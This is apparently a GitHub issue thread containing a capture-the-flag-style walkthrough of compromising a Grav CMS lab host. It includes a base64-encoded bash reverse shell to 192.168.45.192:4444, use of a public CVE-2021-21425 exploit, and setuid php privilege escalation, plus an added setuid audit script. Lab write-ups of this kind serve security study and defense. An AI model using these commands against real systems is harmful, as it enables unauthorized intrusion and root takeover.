Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-03-17 17:46 grav-admin/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
Access "http://192.168.243.12/grav-admin/" --> Grav, Trilby Media
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.12/grav-admin/FUZZ
Tried accessing these pages but made no progress
(Tried the admin/admin login but it failed)
Searched for exploit info for Grav and Trilby (even though we don't know the version info) --> https://github.com/CsEnox/CVE-2021-21425
Anyway, try it:
At first, we need to edit the 449973.py file:
echo -ne "bash -i >& /dev/tcp/192.168.45.192/4444 0>&1" | base64 -w0
===> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE5Mi80NDQ0IDA+JjE=
Run 'python3 49973.py' --> we get a reverse shell from the target host!
linpeas --> As on the Exghost box, we saw [CVE-2021-4034] PwnKit, but it didn't work 😄
find / -perm -u=s -type f 2>/dev/null --> /usr/bin/php7.4
According to https://gtfobins.github.io/gtfobins/php/, we can get root (even though id still shows www-data)
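The setuid php7.4 finding above is the kind of thing a host baseline audit should catch before an attacker does. The following is an added example, not part of this thread or of any project mentioned in it: it lists setuid files under a root directory, and flags any that is a script interpreter (which should never be setuid) or is not on an assumed allowlist of binaries that legitimately need the bit. Both lists are assumptions to adjust to the host's own baseline.

```shell
#!/bin/sh
# Audit setuid files under a directory tree and flag interpreters and
# anything outside an allowlist. Lists below are assumptions, not a
# vendor baseline; tune them per host image.
ALLOWED="sudo su passwd chsh chfn gpasswd newgrp mount umount fusermount pkexec"
INTERPRETERS="php php7.4 php8.1 python python3 perl ruby node bash sh"

# list_setuid ROOT -> prints every regular file with the setuid bit under ROOT
list_setuid() {
    find "$1" -xdev -perm -4000 -type f 2>/dev/null
}

# classify_setuid PATH -> prints "interpreter", "allowed" or "unexpected"
classify_setuid() {
    name=$(basename "$1")
    for i in $INTERPRETERS; do
        [ "$name" = "$i" ] && { echo interpreter; return 0; }
    done
    for a in $ALLOWED; do
        [ "$name" = "$a" ] && { echo allowed; return 0; }
    done
    echo unexpected
}

# audit_setuid ROOT -> prints "<class> <path>" per setuid file.
# Exit status 1 if any interpreter or unexpected setuid file was found.
audit_setuid() {
    rc=0
    # heredoc instead of a pipe so rc survives (no subshell), and read -r
    # keeps paths with spaces intact
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        c=$(classify_setuid "$f")
        echo "$c $f"
        [ "$c" = allowed ] || rc=1
    done <<EOF
$(list_setuid "$1")
EOF
    return $rc
}

# Typical use on a live host (requires no root; unreadable dirs are skipped):
#   audit_setuid / || echo "setuid review needed"
```

Run it from a cron job or configuration-management check and alert on a non-zero exit, then either strip the bit (chmod u-s) or justify the entry in the allowlist.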
@WDavid404 The exploit at "https://github.com/CsEnox/CVE-2021-21425" has changed and the exploit you show with the screenshot does not exist. Even though I had a vulnerable site, I could not trigger it with the existing exploit. Do you have the file named 449973.py? Or can you give me an example raw request? Or which command should I use with the -c command in the current exploit? Even though I use "bash -i >& /dev/tcp/ip/4444 0>&1" with the -c parameter, the exploit is not triggered.
Keypoints: